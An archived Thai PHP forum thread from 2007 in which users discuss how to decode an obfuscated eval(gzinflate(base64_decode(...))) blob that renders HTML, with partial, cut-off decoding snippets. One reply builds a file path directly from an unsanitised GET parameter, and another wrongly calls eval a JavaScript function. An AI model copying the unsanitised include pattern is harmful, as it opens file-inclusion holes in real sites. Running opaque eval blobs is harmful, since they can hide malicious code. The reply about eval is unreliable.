มีใครแกะ Code PHP นี้ได้มั่งครับ !!! [Archive]

View Full Version : มีใครแกะ Code PHP นี้ได้มั่งครับ !!!

hyde4fun

28-08-2007, 11:04 PM

มีเรื่องอยู่ว่า ผมไปได้ Code PHP มาตัวนึง และยังหาวิธีถอดออกมาเป็น text ไม่ได้เลยครับ

Code ที่ว่ามีดังนี้

<? eval(gzinflate(base64_decode('
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'))); ?>

Code นี้หลังจาก run แล้วจะได้ หน้าตา Html ออกมา แต่ผมต้องการเห็น code ที่ซ่อนไว้เป็น text น่ะครับ

หลังจาก decode base64 แล้วไปเจอกับ gzinflate นี่คืออะไรอะครับ ส่วน eval นี่มันเปรียบเทียบกับอะไรต่อครับ

ขอเชิญเซียน PHP ทุกท่าน ร่วมแสดงความคิดเห็น ขอบคุณมากครับ

hina_lovex

29-08-2007, 12:29 AM

eval("") เป็น Script ของ JavaScript ครับผม ใช้แปลงจาก Text เป็น obj ที่อ้างอิงได้ ดังนั้นผมคิดว่า ที่ต้องถอดแค่ gzinflate กับbase64_decode ครับ ส่วน gzinfalte นี่ไม่รู้ครับว่าคืออะไร

hyde4fun

29-08-2007, 12:36 AM

ผมเจอวิธี Decode แล้วครับ

**Hidden Content: Check the thread to see hidden data.**

justtalk

29-08-2007, 06:03 PM

อ้าว ชงเอง กินเอง ซะงั้น :P

bankwing

30-08-2007, 12:06 AM

เยี่ยมคับผมก็กำลังอยากรู้อยู่พอดีเลยคับ ขอบคุนมากๆคับ :D

studenmts

06-09-2007, 03:33 AM

เจ๋งเลยครับ ศึกษาด้วยตัวเองแล้วแบ่งปันมีน้ำใจครับ

hansa

07-09-2007, 01:58 PM

ยัง post ไม่ถึงดูเฉลยไม่ได้ แต่ผมเกะ ได้เหมือนกันใช้วิธีนี้ครับ
สมัครมาได้สักพักแล้วแต่พึงเข้ามา
[hide=5]
[code]
<?php
$string ='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';
$decode_base64 = base64_decode($string);
$deflated_string = gzinflate($decode_base64);

$pattern

Komkid

13-09-2007, 05:40 PM

ผมเคยทำแบบนี้ครับ ทำ fuction encode กับ decode ขึ้นมาเอง
1. encode ไฟล์ไว้
ไฟล์ที่ำ encode ไว้เป็นแบบนี้
**Hidden Content: Check the thread to see hidden data.**

2. เวลาจะใช้ก็ decode ออกมาแล้ว สร้างไฟล์ php ใหม่ขึ้นมา แล้ว เรียกไฟล์ใหม่ขึ้นมาแทน
[hide=3][code]$mystr=decode("admin_files/$HTTP_GET_VARS[menu].php");
save_file("tmp.php",$mystr);

$JS=<<<JS
<script language="JavaScript">
<!--